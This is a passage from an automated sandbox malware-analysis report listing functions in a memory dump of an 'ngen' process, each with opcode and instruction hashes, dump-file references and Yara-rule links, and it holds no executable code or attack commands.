                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                      • Instruction ID: 918bab6dfe02c2f1786efff84857a66b126a7757bcaf2a5d013a5ae9f4e9a7de
                                                                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                      • Instruction Fuzzy Hash: 330124372002108BDF10AA29D884FA67767BFC4720F1944E5ED068F257EA71CC81E7A0
                                                                                                                      Function 0576E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ac7f8c9c213c8d4a9de64c1f430e39eb5e6459c6dd3b75b2b57b8771c0885758
                                                                                                                      • Instruction ID: ae9c080ec9ccb18028a87aa31322e091c3bfd09dc6370aba00da0168689c8984
                                                                                                                      • Opcode Fuzzy Hash: ac7f8c9c213c8d4a9de64c1f430e39eb5e6459c6dd3b75b2b57b8771c0885758
                                                                                                                      • Instruction Fuzzy Hash: EB016772301554BFC711BB79CD8CE57BBACFF85660B000625B60987A91DB64EC51DAE0
                                                                                                                      Function 0572C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                      • Instruction ID: 4ff98d67190e206f754bcc859e333ae270284a18e6fffdba3d50be9127989bd5
                                                                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                      • Instruction Fuzzy Hash: 46012832200704AFDB32E666C804EBB73EEFFC4350F04481AAA468B580DE70E845EB61
                                                                                                                      Function 057720F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29bb60a6aafb7a94877923f0f993a21784c5dad816f265378d72b41b74298c7f
                                                                                                                      • Instruction ID: 58298208aa625498f2e2c084b8ba048d477b48630ab94aeee2dc420280b4f93e
                                                                                                                      • Opcode Fuzzy Hash: 29bb60a6aafb7a94877923f0f993a21784c5dad816f265378d72b41b74298c7f
                                                                                                                      • Instruction Fuzzy Hash: E1115B35A1120CAFDF05DF64D859EAE7BB6BB44340F004059F91597250EB35AE11EB90
                                                                                                                      Function 05729353 Relevance: .0, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                      • Instruction ID: 262159254b490ff598e2acfdf43753c4de4116b5fc2342d83792c7a41964f2db
                                                                                                                      • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                      • Instruction Fuzzy Hash: 9711AD32500B21DFD7219F15C880B22B3E5FF40B62F19886CD5994A5A6C374E8C0EB10
                                                                                                                      Function 057EF5BE Relevance: .0, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1c64fd5d4bd28027c67df5df73f5f3791b306cb9807175c764b14faec14b4094
                                                                                                                      • Instruction ID: 656a9c764da9e5a7c71896478d66aa7a89cba03de70930e1fe0659d81d78cc37
                                                                                                                      • Opcode Fuzzy Hash: 1c64fd5d4bd28027c67df5df73f5f3791b306cb9807175c764b14faec14b4094
                                                                                                                      • Instruction Fuzzy Hash: 5E015E71A11348ABDF14EF69E849FAEBBB8EF45700F004466F904EB280DA74DA01DB95
                                                                                                                      Function 057EF453 Relevance: .0, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d99f9ee5bff3202c17cb67bfcf2fdabb55734dddb607d484717a7c535b77097d
                                                                                                                      • Instruction ID: abd8c8bbd687fdac36d18fea62ef58d159f35f2157fe34f1989fcf94853e321a
                                                                                                                      • Opcode Fuzzy Hash: d99f9ee5bff3202c17cb67bfcf2fdabb55734dddb607d484717a7c535b77097d
                                                                                                                      • Instruction Fuzzy Hash: 55019E71A1134CABCF04EFA9D849FAEBBB8EF44310F004026B900EB280DA74DA01DB91
                                                                                                                      Function 0576D1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                      • Instruction ID: 92f3976cffa5f063a8c66b3edd69a76c300ce925d5657b06c7ba9c8e775d2efb
                                                                                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                      • Instruction Fuzzy Hash: A401F772B252049FDB21DA54E808F6573AAFFC5724F104115FE158B280EB34DD41EB91
                                                                                                                      Function 0574E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                      • Instruction ID: cd8275fe62923005a96f882f7e18193308a82616d9b14081283620e3f3c565fa
                                                                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                      • Instruction Fuzzy Hash: DE017C322445809FD322D61DC948F3677DDFF45B60F1904A1E916CBAA1D778DC40DA22
                                                                                                                      Function 05732582 Relevance: .0, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 662098b754032cdba11c8893dd0c65f765d1fc463b9547c4ba2e6ee74070a001
                                                                                                                      • Instruction ID: daea7c126b25463dc3b79d3a367e6142c0ecfae9f4b5f8563d4cc03d1cab5cc7
                                                                                                                      • Opcode Fuzzy Hash: 662098b754032cdba11c8893dd0c65f765d1fc463b9547c4ba2e6ee74070a001
                                                                                                                      • Instruction Fuzzy Hash: C6F0F433741B20B7C731DB568C45F17BAAAEB84BA0F104428A60597641DA30ED01EAB0
                                                                                                                      Function 057EF367 Relevance: .0, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f00cfe69fbd3cd6a6f320fbf20f7619703186548452451c64639fc4291371477
                                                                                                                      • Instruction ID: 7fcbb55445ffe5a43e44c113e7c10b651fa3bbfa076e28b7d532240d4e2ec703
                                                                                                                      • Opcode Fuzzy Hash: f00cfe69fbd3cd6a6f320fbf20f7619703186548452451c64639fc4291371477
                                                                                                                      • Instruction Fuzzy Hash: A4018471A11358EBDB10EFA5E809FAE7BB8EF44700F004466F501EB280DA74DD00DB94
                                                                                                                      Function 057F972B Relevance: .0, Instructions: 44COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                      Function 05805636 Relevance: .0, Instructions: 44COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d3858f5531ae142059cc0e41e6795bcebf76b8f6ed183a142a4d60e8da5e41e3
                                                                                                                      • Instruction ID: 958447a6c4610112334221cdcebd737e7bde8daccf8998c6dcd0de314180d889
                                                                                                                      • Opcode Fuzzy Hash: d3858f5531ae142059cc0e41e6795bcebf76b8f6ed183a142a4d60e8da5e41e3
                                                                                                                      • Instruction Fuzzy Hash: 3E115B74A10259EBCF04DFA8D449AAEBBB4EF08304F10845AA815EB380D634DA02CB65
                                                                                                                      Function 05805537 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cc2a595ac7c7a56a8daa61255758dabb975e66312e69be9e0fd232303cb92a3b
                                                                                                                      • Instruction ID: 4293e25815045aed9ed8c8fc8b8998d3bcb76498e1bd267a4d478ef98efee7ee
                                                                                                                      • Opcode Fuzzy Hash: cc2a595ac7c7a56a8daa61255758dabb975e66312e69be9e0fd232303cb92a3b
                                                                                                                      • Instruction Fuzzy Hash: F9111B70A10249DFDB44DFA9D945BADBBF4BF08304F04426AE909EB382E634D941DF90
                                                                                                                      Function 05765734 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                      • Instruction ID: 177d87c44f88ba39c84fede23d0650246bf5439c46af54d7115fa973cef41979
                                                                                                                      • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                      • Instruction Fuzzy Hash: A7F0FF72A05214AFE319CF5CC880F6AB7EDEB45650F054079D901DB230E671DE04DA94
                                                                                                                      Function 05805152 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f13517c6b81df323428f9b3efe64164400f501d6414793d3f2cfb84bb5a714d6
                                                                                                                      • Instruction ID: 7a57cb3db9bdb82836ffe660b8efe127de104ae33ce560d77b2bb12e062ab84f
                                                                                                                      • Opcode Fuzzy Hash: f13517c6b81df323428f9b3efe64164400f501d6414793d3f2cfb84bb5a714d6
                                                                                                                      • Instruction Fuzzy Hash: 50012C71A1020DABDB00DFA9E9459EEBBF8FF48304F10405AF905E7380E734AA01CBA1
                                                                                                                      Function 0575C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                      • Instruction ID: dc7c3e26f51401abd98c4089ab474825eefbb2b5aa5013c4b87b4e01421d3741
                                                                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                      • Instruction Fuzzy Hash: B8F0C2B2600615ABD335CF4DDC40F57F7EEEBC0A90F048128A909CB220EA71DD04CB90
                                                                                                                      Function 058050D9 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a900482a6458c73144689c4601b52797b299e95aa77d10721ce9d51e78d04bc6
                                                                                                                      • Instruction ID: d92fa08455112f0a6bff13fd25f3847f3d60ed8cabdc0fe4ab8aada2e9f741ab
                                                                                                                      • Opcode Fuzzy Hash: a900482a6458c73144689c4601b52797b299e95aa77d10721ce9d51e78d04bc6
                                                                                                                      • Instruction Fuzzy Hash: 2D011E71A1020DABDF00DF69E9459AEBBB8EF48304F50445AE905E7280E674A9018BA1
                                                                                                                      Function 05805060 Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0131fbf3cbc9005c1e924e93d62fad0879bb8d1b896f95454f8db23c17589710
                                                                                                                      • Instruction ID: b7b3bf80553babfc6fe5c8ab11c621d80b676263787a6ff205705ca77f35416e
                                                                                                                      • Opcode Fuzzy Hash: 0131fbf3cbc9005c1e924e93d62fad0879bb8d1b896f95454f8db23c17589710
                                                                                                                      • Instruction Fuzzy Hash: 3C012C71A1121DABDF04DFA9D9459EEBBF9FF48304F10405AF905E7381D634AA01CBA1
                                                                                                                      Function 057EF78A Relevance: .0, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7ecf29abc397d4b0f86d792a8c4b3652f60349870724c219c5a852dffd1727d8
                                                                                                                      • Instruction ID: f00e318c7a2421784b2553bab1e1f9b039c32c1a30e619a7ac597c13ce9e81d2
                                                                                                                      • Opcode Fuzzy Hash: 7ecf29abc397d4b0f86d792a8c4b3652f60349870724c219c5a852dffd1727d8
                                                                                                                      • Instruction Fuzzy Hash: 6D01D7B4A01749AFCB04DFA9D549AAEBBF5AF08304F50806AE815E7341EA74DA00DB91
                                                                                                                      Function 058061E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 65dc7b1409bd7535685f97ee0fdb51ca0518dd48a3fa050c990d0e72706df497
                                                                                                                      • Instruction ID: cff1a56282baca850cb3b13f95433cebd9409de7e8a1acb11bd9bdeff314da9a
                                                                                                                      • Opcode Fuzzy Hash: 65dc7b1409bd7535685f97ee0fdb51ca0518dd48a3fa050c990d0e72706df497
                                                                                                                      • Instruction Fuzzy Hash: BD017171A0025D9BCF00DFA9D849AAEBBF4AF44314F144059E901E7280D774AA01CB55
                                                                                                                      Function 057BA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1f1dc26155718bd8e1a4814273a6b699bf21494908cbf7bc34358320abb72f06
                                                                                                                      • Instruction ID: 575e10dfd700026376dc5a8f55636c83f921bc09a08da2a0c2cbb98789f8dd51
                                                                                                                      • Opcode Fuzzy Hash: 1f1dc26155718bd8e1a4814273a6b699bf21494908cbf7bc34358320abb72f06
                                                                                                                      • Instruction Fuzzy Hash: 89018936110209ABDF12AE85D845EDA7F66FB4C754F058101FE1966220C636EA70EB81
                                                                                                                      Function 0576656A Relevance: .0, Instructions: 39COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02b70ce9665bf6b74460d96bdd1b7117a969ffef10c9a0f45f51836064e9e45b
                                                                                                                      • Instruction ID: 5d7711aae9b8aaa6abed63a0ceec79c395b3ff8cdddfee72635066aa10cf50e6
                                                                                                                      • Opcode Fuzzy Hash: 02b70ce9665bf6b74460d96bdd1b7117a969ffef10c9a0f45f51836064e9e45b
                                                                                                                      • Instruction Fuzzy Hash: 3A01A4713446809BE7229729CD4DF3537AABB80B00F884694FD029BAD2EBA9E841A510
                                                                                                                      Function 0572C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 234fef23215b0fa334c299dc22ab373389ef91c62ce16829f15a9de15354134d
                                                                                                                      • Instruction ID: 77918c7490a8a6c38f0862d739383f9a877da69e3c06fb8b39f5e12e170e0389
                                                                                                                      • Opcode Fuzzy Hash: 234fef23215b0fa334c299dc22ab373389ef91c62ce16829f15a9de15354134d
                                                                                                                      • Instruction Fuzzy Hash: 2EF0F6B1314221BBE315951B9C46F7632EAE7E0750F658026E7058B2C1E970DC019294
                                                                                                                      Function 05803749 Relevance: .0, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                      • Instruction ID: de9b3fd007a8f77de6e06db9d13a80ecd85944c2db216f4aef1f4f4150fe1c69
                                                                                                                      • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                      • Instruction Fuzzy Hash: 28F04FB6A40208BFE711EBA4CD45FEAB7BCEB04714F100566A916D61D0EA70AE44DBA0
                                                                                                                      Function 057D437C Relevance: .0, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                      • Instruction ID: 7cd3f188ec949cb26a3445f4ff09992639bd6329907d959f5f57e79edc3dc1bf
                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                      • Instruction Fuzzy Hash: 4FF0E932345A1247DF35AA2DC418B2AE277BF80A10B05052C9C06EB680DFB0D800A7A0
                                                                                                                      Function 058055C9 Relevance: .0, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7313aa7273bb6b1816428dff74bc8734c8119a7c6fc17a443330bb6963111add
                                                                                                                      • Instruction ID: 46443215ae91555458031d23fc1a05028e80653581539cc92f75e6dd57fde6c8
                                                                                                                      • Opcode Fuzzy Hash: 7313aa7273bb6b1816428dff74bc8734c8119a7c6fc17a443330bb6963111add
                                                                                                                      • Instruction Fuzzy Hash: 76F03174A1024CAFDF04EFA8D549A9EBBF4EF08304F104455B805EB380DA74DA00DB55
                                                                                                                      Function 057347FB Relevance: .0, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3687a560412bd8b03556100d1cc14a8fd6beb9e739a842377cd2bd29fae4feab
                                                                                                                      • Instruction ID: a5301ca96789f4cfdfbfb67e5e0f8c73229ab8e3227b8a0e5a55beb961adb67d
                                                                                                                      • Opcode Fuzzy Hash: 3687a560412bd8b03556100d1cc14a8fd6beb9e739a842377cd2bd29fae4feab
                                                                                                                      • Instruction Fuzzy Hash: 60F024359063E08FDF35CB18C40DFB177D7AB00730F08886AC48A83543C320D880EA10
                                                                                                                      Function 057EF6C7 Relevance: .0, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6c328f79ea561cd2c940126dd89f12bcc43a67776ff58e2fdbcf1dd4c36c51e5
                                                                                                                      • Instruction ID: 903d3a2428de8fc0311887a22f792f3fca828382d5236bb0a682a6caee5b3241
                                                                                                                      • Opcode Fuzzy Hash: 6c328f79ea561cd2c940126dd89f12bcc43a67776ff58e2fdbcf1dd4c36c51e5
                                                                                                                      • Instruction Fuzzy Hash: E0F06D71A10348EFDF04EFA9D809EAEBBF4AF08304F404069E905EB281EA34E900DB54
                                                                                                                      Function 057F0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
